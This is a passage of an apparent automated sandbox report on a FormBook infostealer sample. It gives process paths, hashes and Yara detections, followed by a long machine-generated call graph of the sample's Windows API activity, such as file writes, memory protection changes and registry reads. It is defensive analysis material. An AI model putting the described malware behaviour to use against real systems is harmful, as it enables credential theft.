                                                                                    Path:C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:10:53:31
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:17'408 bytes
                                                                                    MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:10:53:44
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:8
                                                                                    Start time:10:53:57
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff745470000
                                                                                    File size:675'744 bytes
                                                                                    MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.8%
                                                                                      Dynamic/Decrypted Code Coverage:1.1%
                                                                                      Signature Coverage:3.1%
                                                                                      Total number of Nodes:1714
                                                                                      Total number of Limit Nodes:66
98880 112fe4 98879->98880 98960 e00a3 29 API calls 98880->98960 98881 ca81b 41 API calls 98881->98889 98884 112fee 98961 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98884->98961 98889->98872 98889->98877 98889->98878 98889->98881 98890 d04f0 22 API calls 98889->98890 98891 13359c 82 API calls 98889->98891 98957 ca8c7 22 API calls 98889->98957 98958 da308 207 API calls 98889->98958 98962 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98889->98962 98963 e00a3 29 API calls 98889->98963 98964 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98889->98964 98965 1447d4 207 API calls 98889->98965 98966 1468c1 207 API calls 98889->98966 98890->98889 98891->98889 98895 d1376 98894->98895 98896 d17b0 98894->98896 98897 116331 98895->98897 98900 d1940 9 API calls 98895->98900 99088 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98896->99088 99047 14709c 98897->99047 98903 d13a0 98900->98903 98901 d17ba 98904 d17fb 98901->98904 98906 c9cb3 22 API calls 98901->98906 98902 11633d 98902->98847 98905 d1940 9 API calls 98903->98905 98908 116346 98904->98908 98910 d182c 98904->98910 98907 d13b6 98905->98907 98913 d17d4 98906->98913 98907->98904 98909 d13ec 98907->98909 99093 13359c 82 API calls 98908->99093 98909->98908 98919 d1408 98909->98919 99090 caceb 23 API calls 98910->99090 99089 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98913->99089 98914 d1839 99091 dd217 207 API calls 98914->99091 98917 11636e 99094 13359c 82 API calls 98917->99094 98918 d1872 98918->98897 99092 dfaeb 23 API calls 98918->99092 98919->98914 98919->98917 98926 dfddb 22 API calls 98919->98926 98927 dfe0b 22 API calls 98919->98927 98932 cec40 207 API calls 98919->98932 98933 d152f 98919->98933 98936 1163b2 98919->98936 98940 d15c7 98919->98940 98921 1163d1 99096 145745 54 API calls 98921->99096 98922 d153c 98924 
d1940 9 API calls 98922->98924 98925 d1549 98924->98925 98929 d1940 9 API calls 98925->98929 98925->98940 98926->98919 98927->98919 98938 d1563 98929->98938 98931 d171d 98931->98847 98932->98919 98933->98921 98933->98922 98934 d1940 9 API calls 98934->98940 99095 13359c 82 API calls 98936->99095 98937 d167b 98937->98931 99087 dce17 22 API calls 98937->99087 98938->98940 99097 ca8c7 22 API calls 98938->99097 98940->98918 98940->98934 98940->98937 98967 c6246 98940->98967 98971 13f0ec 98940->98971 98980 c6216 98940->98980 98985 14958b 98940->98985 98988 1383da 98940->98988 98991 13744a 98940->98991 99098 13359c 82 API calls 98940->99098 98948->98847 98949->98847 98950->98847 98951->98847 98952->98858 98953->98858 98954->98858 98955->98869 98956->98870 98957->98889 98958->98889 98959->98876 98960->98884 98961->98889 98962->98889 98963->98889 98964->98889 98965->98889 98966->98889 98968 c625f 98967->98968 98969 c6250 98967->98969 98968->98969 98970 c6264 CloseHandle 98968->98970 98969->98940 98970->98969 98972 c7510 53 API calls 98971->98972 98973 13f126 98972->98973 99099 c9e90 98973->99099 98975 13f136 98976 13f15b 98975->98976 98977 cec40 207 API calls 98975->98977 98979 13f15f 98976->98979 99127 c9c6e 22 API calls 98976->99127 98977->98976 98979->98940 98981 c6246 CloseHandle 98980->98981 98982 c621e 98981->98982 98983 c6246 CloseHandle 98982->98983 98984 c622d 98983->98984 98984->98940 99140 147f59 98985->99140 98987 14959b 98987->98940 99233 1398e3 98988->99233 98990 1383ea 98990->98940 98992 137474 98991->98992 98993 137469 98991->98993 98995 137554 98992->98995 98998 ca961 22 API calls 98992->98998 99328 cb567 39 API calls 98993->99328 98996 dfddb 22 API calls 98995->98996 99045 1376a4 98995->99045 98997 137587 98996->98997 98999 dfe0b 22 API calls 98997->98999 99000 137495 98998->99000 99001 137598 98999->99001 99002 ca961 22 API calls 99000->99002 99004 c6246 CloseHandle 99001->99004 99003 13749e 99002->99003 99005 c7510 53 API calls 99003->99005 99006 1375a3 
99004->99006 99007 1374aa 99005->99007 99008 ca961 22 API calls 99006->99008 99329 c525f 22 API calls 99007->99329 99010 1375ab 99008->99010 99012 c6246 CloseHandle 99010->99012 99011 1374bf 99013 c6350 22 API calls 99011->99013 99014 1375b2 99012->99014 99015 1374f2 99013->99015 99016 c7510 53 API calls 99014->99016 99017 13754a 99015->99017 99330 12d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 99015->99330 99018 1375be 99016->99018 99332 cb567 39 API calls 99017->99332 99020 c6246 CloseHandle 99018->99020 99023 1375c8 99020->99023 99022 137502 99022->99017 99024 137506 99022->99024 99025 c5745 5 API calls 99023->99025 99026 c9cb3 22 API calls 99024->99026 99027 1375e2 99025->99027 99028 137513 99026->99028 99029 1375ea 99027->99029 99030 1376de GetLastError 99027->99030 99331 12d2c1 26 API calls 99028->99331 99333 c53de 27 API calls 99029->99333 99032 1376f7 99030->99032 99034 c6216 CloseHandle 99032->99034 99034->99045 99035 13751c 99035->99017 99036 1375f8 99334 c53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99036->99334 99038 137645 99039 dfddb 22 API calls 99038->99039 99041 137679 99039->99041 99040 1375ff 99040->99038 99042 12ccff 4 API calls 99040->99042 99043 ca961 22 API calls 99041->99043 99042->99038 99044 137686 99043->99044 99044->99045 99335 12417d 22 API calls 99044->99335 99045->98940 99048 1470f5 99047->99048 99049 1470db 99047->99049 99336 145689 99048->99336 99347 13359c 82 API calls 99049->99347 99053 cec40 206 API calls 99054 147164 99053->99054 99055 1471a6 99054->99055 99056 1471ff 99054->99056 99058 1470ed 99054->99058 99063 130acc 22 API calls 99055->99063 99057 147253 99056->99057 99060 147205 99056->99060 99057->99058 99059 c7510 53 API calls 99057->99059 99058->98902 99061 147265 99059->99061 99348 131119 22 API calls 99060->99348 99064 caec9 22 API calls 99061->99064 99066 1471de 99063->99066 99067 147289 CharUpperBuffW 99064->99067 99065 147228 99349 ca673 22 API calls 99065->99349 99069 d1310 206 API calls 
99066->99069 99071 1472a3 99067->99071 99069->99058 99070 147230 99074 cbf40 206 API calls 99070->99074 99072 1472f6 99071->99072 99073 1472aa 99071->99073 99075 c7510 53 API calls 99072->99075 99343 130acc 99073->99343 99074->99058 99076 1472fe 99075->99076 99350 de300 23 API calls 99076->99350 99080 d1310 206 API calls 99080->99058 99081 147308 99081->99058 99082 c7510 53 API calls 99081->99082 99083 147323 99082->99083 99351 ca673 22 API calls 99083->99351 99085 147333 99086 cbf40 206 API calls 99085->99086 99086->99058 99087->98937 99088->98901 99089->98904 99090->98914 99091->98918 99092->98918 99093->98940 99094->98940 99095->98940 99096->98938 99097->98940 99098->98940 99128 c6270 99099->99128 99101 c9fd2 99102 ca4a1 22 API calls 99101->99102 99103 c9fec 99102->99103 99103->98975 99106 ca6c3 22 API calls 99125 c9eb5 99106->99125 99107 10f7c4 99138 1296e2 84 API calls 99107->99138 99108 10f699 99113 dfddb 22 API calls 99108->99113 99110 ca405 99110->99103 99139 1296e2 84 API calls 99110->99139 99116 10f754 99113->99116 99114 10f7d2 99115 ca4a1 22 API calls 99114->99115 99117 10f7e8 99115->99117 99118 dfe0b 22 API calls 99116->99118 99117->99103 99120 ca12c 99118->99120 99120->99107 99120->99110 99121 ca587 22 API calls 99121->99125 99122 caec9 22 API calls 99123 ca0db CharUpperBuffW 99122->99123 99134 ca673 22 API calls 99123->99134 99125->99101 99125->99106 99125->99107 99125->99108 99125->99110 99125->99120 99125->99121 99125->99122 99126 ca4a1 22 API calls 99125->99126 99133 c4573 41 API calls 99125->99133 99135 c48c8 23 API calls 99125->99135 99136 c49bd 22 API calls 99125->99136 99137 ca673 22 API calls 99125->99137 99126->99125 99127->98979 99129 dfe0b 22 API calls 99128->99129 99130 c6295 99129->99130 99131 dfddb 22 API calls 99130->99131 99132 c62a3 99131->99132 99132->99125 99133->99125 99134->99125 99135->99125 99136->99125 99137->99125 99138->99114 99139->99103 99141 c7510 53 API calls 99140->99141 99142 147f90 99141->99142 99166 147fd5 
99142->99166 99178 148cd3 99142->99178 99144 148281 99145 14844f 99144->99145 99150 14828f 99144->99150 99219 148ee4 60 API calls 99145->99219 99148 14845e 99148->99150 99151 14846a 99148->99151 99149 c7510 53 API calls 99168 148049 99149->99168 99191 147e86 99150->99191 99151->99166 99156 1482c8 99206 dfc70 99156->99206 99159 148302 99213 c63eb 22 API calls 99159->99213 99160 1482e8 99212 13359c 82 API calls 99160->99212 99163 1482f3 GetCurrentProcess TerminateProcess 99163->99159 99164 148311 99214 c6a50 22 API calls 99164->99214 99166->98987 99167 14832a 99176 148352 99167->99176 99215 d04f0 22 API calls 99167->99215 99168->99144 99168->99149 99168->99166 99210 12417d 22 API calls 99168->99210 99211 14851d 42 API calls 99168->99211 99169 1484c5 99169->99166 99174 1484d9 FreeLibrary 99169->99174 99171 148341 99216 148b7b 75 API calls 99171->99216 99174->99166 99176->99169 99217 d04f0 22 API calls 99176->99217 99218 caceb 23 API calls 99176->99218 99220 148b7b 75 API calls 99176->99220 99179 caec9 22 API calls 99178->99179 99180 148cee CharLowerBuffW 99179->99180 99221 128e54 99180->99221 99184 ca961 22 API calls 99185 148d2a 99184->99185 99228 c6d25 22 API calls 99185->99228 99187 148d3e 99188 c93b2 22 API calls 99187->99188 99190 148d48 99188->99190 99189 148e5e 99189->99168 99190->99189 99229 14851d 42 API calls 99190->99229 99192 147ea1 99191->99192 99193 147eec 99191->99193 99194 dfe0b 22 API calls 99192->99194 99197 149096 99193->99197 99195 147ec3 99194->99195 99195->99193 99196 dfddb 22 API calls 99195->99196 99196->99195 99198 1492ab 99197->99198 99202 1490ba 99197->99202 99198->99156 99199 cb38f 39 API calls 99199->99202 99200 cb567 39 API calls 99200->99202 99201 cb6b5 39 API calls 99201->99202 99202->99198 99202->99199 99202->99200 99202->99201 99203 c7510 53 API calls 99202->99203 99204 eea0c 21 API calls 99202->99204 99232 12efae 24 API calls 99202->99232 99203->99202 99204->99202 99208 dfc85 99206->99208 99207 dfd1d VirtualProtect 99209 dfceb 
99207->99209 99208->99207 99208->99209 99209->99159 99209->99160 99210->99168 99211->99168 99212->99163 99213->99164 99214->99167 99215->99171 99216->99176 99217->99176 99218->99176 99219->99148 99220->99176 99223 128e74 99221->99223 99222 128f63 99222->99184 99222->99190 99223->99222 99224 128f68 99223->99224 99226 128ea9 99223->99226 99224->99222 99231 dce60 41 API calls 99224->99231 99226->99222 99230 dce60 41 API calls 99226->99230 99228->99187 99229->99189 99230->99226 99231->99224 99232->99202 99234 139902 99233->99234 99235 1399e8 99233->99235 99237 dfddb 22 API calls 99234->99237 99302 139caa 39 API calls 99235->99302 99238 139909 99237->99238 99239 dfe0b 22 API calls 99238->99239 99241 13991a 99239->99241 99240 1399ca 99240->98990 99242 c6246 CloseHandle 99241->99242 99244 139925 99242->99244 99243 139ac5 99284 131e96 99243->99284 99246 ca961 22 API calls 99244->99246 99249 13992d 99246->99249 99247 139acc 99288 12ccff 99247->99288 99248 1399a2 99248->99240 99248->99243 99250 139a33 99248->99250 99252 c6246 CloseHandle 99249->99252 99251 c7510 53 API calls 99250->99251 99255 139a3a 99251->99255 99253 139934 99252->99253 99257 c7510 53 API calls 99253->99257 99256 139abb 99255->99256 99278 139a6e 99255->99278 99314 12cd57 30 API calls 99256->99314 99260 139940 99257->99260 99258 139aa8 99258->99240 99263 c6246 CloseHandle 99258->99263 99262 c6246 CloseHandle 99260->99262 99261 c6270 22 API calls 99264 139a7e 99261->99264 99265 13994a 99262->99265 99266 139b1e 99263->99266 99267 139a8e 99264->99267 99303 ca8c7 22 API calls 99264->99303 99292 c5745 99265->99292 99270 c6216 CloseHandle 99266->99270 99304 c33c6 99267->99304 99270->99240 99274 1399c2 99277 c6216 CloseHandle 99274->99277 99275 13995d 99300 c53de 27 API calls 99275->99300 99277->99240 99278->99261 99280 13996b 99301 c53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99280->99301 99282 139972 99282->99248 99283 12ccff 4 API calls 99282->99283 99283->99248 99285 131ea4 99284->99285 99286 
131e9f 99284->99286 99285->99247 99315 130f67 24 API calls 99286->99315 99289 12cd19 WriteFile 99288->99289 99290 12cd0e 99288->99290 99289->99258 99316 12cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99290->99316 99293 c575c CreateFileW 99292->99293 99294 104035 99292->99294 99295 c577b 99293->99295 99294->99295 99296 10403b CreateFileW 99294->99296 99295->99274 99295->99275 99296->99295 99297 104063 99296->99297 99317 c54c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99297->99317 99299 10406e 99299->99295 99300->99280 99301->99282 99302->99248 99303->99267 99305 c33dd 99304->99305 99306 1030bb 99304->99306 99318 c33ee 99305->99318 99308 dfddb 22 API calls 99306->99308 99310 1030c5 99308->99310 99309 c33e8 99313 12cd57 30 API calls 99309->99313 99311 dfe0b 22 API calls 99310->99311 99312 1030fe 99311->99312 99313->99258 99314->99258 99315->99285 99316->99289 99317->99299 99319 c33fe 99318->99319 99320 10311d 99319->99320 99321 c3411 99319->99321 99323 dfddb 22 API calls 99320->99323 99322 ca587 22 API calls 99321->99322 99324 c341e 99322->99324 99325 103127 99323->99325 99324->99309 99326 dfe0b 22 API calls 99325->99326 99327 103157 99326->99327 99328->98992 99329->99011 99330->99022 99331->99035 99332->98995 99333->99036 99334->99040 99335->99045 99337 1456f2 99336->99337 99338 1456a4 99336->99338 99337->99053 99339 dfe0b 22 API calls 99338->99339 99340 1456c6 99339->99340 99340->99337 99341 dfddb 22 API calls 99340->99341 99352 130a59 22 API calls 99340->99352 99341->99340 99344 130ada 99343->99344 99346 130b13 99343->99346 99345 dfddb 22 API calls 99344->99345 99344->99346 99345->99346 99346->99080 99347->99058 99348->99065 99349->99070 99350->99081 99351->99085 99352->99340 99353 cf7bf 99354 cfcb6 99353->99354 99355 cf7d3 99353->99355 99390 caceb 23 API calls 99354->99390 99357 cfcc2 99355->99357 99358 dfddb 22 API calls 99355->99358 99391 caceb 23 API calls 99357->99391 99360 cf7e5 99358->99360 99360->99357 99361 cf83e 99360->99361 99362 
cfd3d 99360->99362 99364 d1310 207 API calls 99361->99364 99370 ced9d 99361->99370 99392 131155 22 API calls 99362->99392 99369 cec76 99364->99369 99365 dfddb 22 API calls 99365->99369 99366 114beb 99398 13359c 82 API calls 99366->99398 99368 cfef7 99368->99370 99394 ca8c7 22 API calls 99368->99394 99369->99365 99369->99366 99369->99368 99369->99370 99371 cf3ae 99369->99371 99373 114b0b 99369->99373 99374 114600 99369->99374 99378 ca8c7 22 API calls 99369->99378 99381 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99369->99381 99382 cfbe3 99369->99382 99383 ca961 22 API calls 99369->99383 99386 e00a3 29 API calls 99369->99386 99387 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99369->99387 99388 d01e0 207 API calls 99369->99388 99389 d06a0 41 API calls 99369->99389 99371->99370 99395 13359c 82 API calls 99371->99395 99396 13359c 82 API calls 99373->99396 99374->99370 99393 ca8c7 22 API calls 99374->99393 99378->99369 99381->99369 99382->99370 99382->99371 99384 114bdc 99382->99384 99383->99369 99397 13359c 82 API calls 99384->99397 99386->99369 99387->99369 99388->99369 99389->99369 99390->99357 99391->99362 99392->99370 99393->99370 99394->99370 99395->99370 99396->99370 99397->99366 99398->99370 99399 c1098 99404 c42de 99399->99404 99403 c10a7 99405 ca961 22 API calls 99404->99405 99406 c42f5 GetVersionExW 99405->99406 99407 c6b57 22 API calls 99406->99407 99408 c4342 99407->99408 99409 c93b2 22 API calls 99408->99409 99421 c4378 99408->99421 99410 c436c 99409->99410 99412 c37a0 22 API calls 99410->99412 99411 c441b GetCurrentProcess IsWow64Process 99413 c4437 99411->99413 99412->99421 99414 c444f LoadLibraryA 99413->99414 99415 103824 GetSystemInfo 99413->99415 99416 c449c GetSystemInfo 99414->99416 99417 c4460 GetProcAddress 99414->99417 99418 c4476 99416->99418 99417->99416 99420 c4470 GetNativeSystemInfo 99417->99420 99422 c447a FreeLibrary 99418->99422 99423 c109d 
99418->99423 99419 1037df 99420->99418 99421->99411 99421->99419 99422->99423 99424 e00a3 29 API calls 99423->99424 99424->99403 99425 102ba5 99426 c2b25 99425->99426 99427 102baf 99425->99427 99453 c2b83 7 API calls 99426->99453 99468 c3a5a 99427->99468 99431 102bb8 99433 c9cb3 22 API calls 99431->99433 99435 102bc6 99433->99435 99434 c2b2f 99446 c2b44 99434->99446 99457 c3837 99434->99457 99436 102bf5 99435->99436 99437 102bce 99435->99437 99440 c33c6 22 API calls 99436->99440 99438 c33c6 22 API calls 99437->99438 99442 102bd9 99438->99442 99441 102bf1 GetForegroundWindow ShellExecuteW 99440->99441 99447 102c26 99441->99447 99444 c6350 22 API calls 99442->99444 99448 102be7 99444->99448 99445 c2b5f 99450 c2b66 SetCurrentDirectoryW 99445->99450 99446->99445 99467 c30f2 Shell_NotifyIconW 99446->99467 99447->99445 99451 c33c6 22 API calls 99448->99451 99452 c2b7a 99450->99452 99451->99441 99475 c2cd4 7 API calls 99453->99475 99455 c2b2a 99456 c2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99455->99456 99456->99434 99458 c3862 99457->99458 99476 c4212 99458->99476 99461 c38e8 99463 103386 Shell_NotifyIconW 99461->99463 99464 c3906 Shell_NotifyIconW 99461->99464 99480 c3923 99464->99480 99466 c391c 99466->99446 99467->99445 99469 101f50 99468->99469 99470 c3a67 GetModuleFileNameW 99469->99470 99471 c9cb3 22 API calls 99470->99471 99472 c3a8d 99471->99472 99473 c3aa2 23 API calls 99472->99473 99474 c3a97 99473->99474 99474->99431 99475->99455 99477 1035a4 99476->99477 99478 c38b7 99476->99478 99477->99478 99479 1035ad DestroyIcon 99477->99479 99478->99461 99502 12c874 42 API calls 99478->99502 99479->99478 99481 c393f 99480->99481 99482 c3a13 99480->99482 99483 c6270 22 API calls 99481->99483 99482->99466 99484 c394d 99483->99484 99485 103393 LoadStringW 99484->99485 99486 c395a 99484->99486 99488 1033ad 99485->99488 99487 c6b57 22 API calls 99486->99487 99489 c396f 99487->99489 99496 c3994 99488->99496 99503 ca8c7 22 API calls 99488->99503 99490 c397c 
99489->99490 99491 1033c9 99489->99491 99490->99488 99493 c3986 99490->99493 99494 c6350 22 API calls 99491->99494 99495 c6350 22 API calls 99493->99495 99497 1033d7 99494->99497 99495->99496 99499 c39f9 Shell_NotifyIconW 99496->99499 99497->99496 99498 c33c6 22 API calls 99497->99498 99500 1033f9 99498->99500 99499->99482 99501 c33c6 22 API calls 99500->99501 99501->99496 99502->99461 99503->99496 99504 e03fb 99505 e0407 99504->99505 99533 dfeb1 99505->99533 99507 e040e 99508 e0561 99507->99508 99511 e0438 99507->99511 99560 e083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 99508->99560 99510 e0568 99561 e4e52 28 API calls 99510->99561 99522 e0477 99511->99522 99544 f247d 99511->99544 99513 e056e 99562 e4e04 28 API calls 99513->99562 99517 e0576 99518 e0457 99520 e04d8 99552 e0959 99520->99552 99522->99520 99556 e4e1a 38 API calls 99522->99556 99524 e04de 99525 e04f3 99524->99525 99557 e0992 GetModuleHandleW 99525->99557 99527 e04fa 99527->99510 99528 e04fe 99527->99528 99529 e0507 99528->99529 99558 e4df5 28 API calls 99528->99558 99559 e0040 13 API calls 99529->99559 99532 e050f 99532->99518 99534 dfeba 99533->99534 99563 e0698 IsProcessorFeaturePresent 99534->99563 99536 dfec6 99564 e2c94 10 API calls 99536->99564 99538 dfecb 99539 dfecf 99538->99539 99565 f2317 99538->99565 99539->99507 99542 dfee6 99542->99507 99547 f2494 99544->99547 99545 e0a8c 5 API calls 99546 e0451 99545->99546 99546->99518 99548 f2421 99546->99548 99547->99545 99550 f2450 99548->99550 99549 e0a8c 5 API calls 99551 f2479 99549->99551 99550->99549 99551->99522 99616 e2340 99552->99616 99555 e097f 99555->99524 99556->99520 99557->99527 99558->99529 99559->99532 99560->99510 99561->99513 99562->99517 99563->99536 99564->99538 99569 fd1f6 99565->99569 99568 e2cbd 8 API calls 99568->99539 99570 fd20f 99569->99570 99571 fd213 99569->99571 99587 e0a8c 99570->99587 99571->99570 99575 f4bfb 99571->99575 99573 dfed8 99573->99542 99573->99568 
99576 f4c07 99575->99576 99594 f2f5e EnterCriticalSection 99576->99594 99578 f4c0e 99595 f50af 99578->99595 99580 f4c1d 99581 f4c2c 99580->99581 99608 f4a8f 29 API calls 99580->99608 99610 f4c48 LeaveCriticalSection 99581->99610 99584 f4c27 99609 f4b45 GetStdHandle GetFileType 99584->99609 99585 f4c3d 99585->99571 99588 e0a97 IsProcessorFeaturePresent 99587->99588 99589 e0a95 99587->99589 99591 e0c5d 99588->99591 99589->99573 99615 e0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99591->99615 99593 e0d40 99593->99573 99594->99578 99596 f50bb 99595->99596 99597 f50df 99596->99597 99598 f50c8 99596->99598 99611 f2f5e EnterCriticalSection 99597->99611 99612 ef2d9 20 API calls 99598->99612 99601 f50cd 99613 f27ec 26 API calls 99601->99613 99603 f5117 99614 f513e LeaveCriticalSection 99603->99614 99604 f50d7 99604->99580 99606 f5000 21 API calls 99607 f50eb 99606->99607 99607->99603 99607->99606 99608->99584 99609->99581 99610->99585 99611->99607 99612->99601 99613->99604 99614->99604 99615->99593 99617 e096c GetStartupInfoW 99616->99617 99617->99555 99618 c105b 99623 c344d 99618->99623 99620 c106a 99654 e00a3 29 API calls 99620->99654 99622 c1074 99624 c345d 99623->99624 99625 ca961 22 API calls 99624->99625 99626 c3513 99625->99626 99627 c3a5a 24 API calls 99626->99627 99628 c351c 99627->99628 99655 c3357 99628->99655 99631 c33c6 22 API calls 99632 c3535 99631->99632 99633 c515f 22 API calls 99632->99633 99634 c3544 99633->99634 99635 ca961 22 API calls 99634->99635 99636 c354d 99635->99636 99637 ca6c3 22 API calls 99636->99637 99638 c3556 RegOpenKeyExW 99637->99638 99639 103176 RegQueryValueExW 99638->99639 99645 c3578 99638->99645 99640 103193 99639->99640 99641 10320c RegCloseKey 99639->99641 99642 dfe0b 22 API calls 99640->99642 99643 10321e 99641->99643 99641->99645 99644 1031ac 99642->99644 99643->99645 99648 c4c6d 22 API calls 99643->99648 99652 c9cb3 22 API calls 99643->99652 99653 c515f 22 API calls 99643->99653 
99646 c5722 22 API calls 99644->99646 99645->99620 99647 1031b7 RegQueryValueExW 99646->99647 99649 1031d4 99647->99649 99651 1031ee 99647->99651 99648->99643 99650 c6b57 22 API calls 99649->99650 99650->99651 99651->99641 99652->99643 99653->99643 99654->99622 99656 101f50 99655->99656 99657 c3364 GetFullPathNameW 99656->99657 99658 c3386 99657->99658 99659 c6b57 22 API calls 99658->99659 99660 c33a4 99659->99660 99660->99631 99661 c3156 99664 c3170 99661->99664 99665 c3187 99664->99665 99666 c318c 99665->99666 99667 c31eb 99665->99667 99702 c31e9 99665->99702 99668 c3199 99666->99668 99669 c3265 PostQuitMessage 99666->99669 99671 102dfb 99667->99671 99672 c31f1 99667->99672 99674 c31a4 99668->99674 99675 102e7c 99668->99675 99706 c316a 99669->99706 99670 c31d0 DefWindowProcW 99670->99706 99713 c18e2 10 API calls 99671->99713 99676 c321d SetTimer RegisterWindowMessageW 99672->99676 99677 c31f8 99672->99677 99679 c31ae 99674->99679 99680 102e68 99674->99680 99718 12bf30 34 API calls 99675->99718 99681 c3246 CreatePopupMenu 99676->99681 99676->99706 99683 102d9c 99677->99683 99684 c3201 KillTimer 99677->99684 99678 102e1c 99714 de499 42 API calls 99678->99714 99687 c31b9 99679->99687 99688 102e4d 99679->99688 99717 12c161 27 API calls 99680->99717 99681->99706 99690 102da1 99683->99690 99691 102dd7 MoveWindow 99683->99691 99709 c30f2 Shell_NotifyIconW 99684->99709 99694 c3253 99687->99694 99699 c31c4 99687->99699 99688->99670 99716 120ad7 22 API calls 99688->99716 99689 102e8e 99689->99670 99689->99706 99695 102dc6 SetFocus 99690->99695 99696 102da7 99690->99696 99691->99706 99693 c3214 99710 c3c50 DeleteObject DestroyWindow 99693->99710 99711 c326f 44 API calls 99694->99711 99695->99706 99696->99699 99700 102db0 99696->99700 99699->99670 99715 c30f2 Shell_NotifyIconW 99699->99715 99712 c18e2 10 API calls 99700->99712 99702->99670 99703 c3263 99703->99706 99707 102e41 99708 c3837 49 API calls 99707->99708 99708->99702 99709->99693 99710->99706 99711->99703 
99712->99706 99713->99678 99714->99699 99715->99707 99716->99702 99717->99703 99718->99689 99719 c2e37 99720 ca961 22 API calls 99719->99720 99721 c2e4d 99720->99721 99798 c4ae3 99721->99798 99723 c2e6b 99724 c3a5a 24 API calls 99723->99724 99725 c2e7f 99724->99725 99726 c9cb3 22 API calls 99725->99726 99727 c2e8c 99726->99727 99728 c4ecb 94 API calls 99727->99728 99729 c2ea5 99728->99729 99730 102cb0 99729->99730 99731 c2ead 99729->99731 99732 132cf9 80 API calls 99730->99732 99812 ca8c7 22 API calls 99731->99812 99733 102cc3 99732->99733 99734 102ccf 99733->99734 99736 c4f39 68 API calls 99733->99736 99740 c4f39 68 API calls 99734->99740 99736->99734 99737 c2ec3 99813 c6f88 22 API calls 99737->99813 99739 c2ecf 99741 c9cb3 22 API calls 99739->99741 99742 102ce5 99740->99742 99743 c2edc 99741->99743 99828 c3084 22 API calls 99742->99828 99744 ca81b 41 API calls 99743->99744 99746 c2eec 99744->99746 99748 c9cb3 22 API calls 99746->99748 99747 102d02 99829 c3084 22 API calls 99747->99829 99750 c2f12 99748->99750 99752 ca81b 41 API calls 99750->99752 99751 102d1e 99753 c3a5a 24 API calls 99751->99753 99755 c2f21 99752->99755 99754 102d44 99753->99754 99830 c3084 22 API calls 99754->99830 99757 ca961 22 API calls 99755->99757 99759 c2f3f 99757->99759 99758 102d50 99831 ca8c7 22 API calls 99758->99831 99814 c3084 22 API calls 99759->99814 99762 102d5e 99832 c3084 22 API calls 99762->99832 99763 c2f4b 99815 e4a28 40 API calls 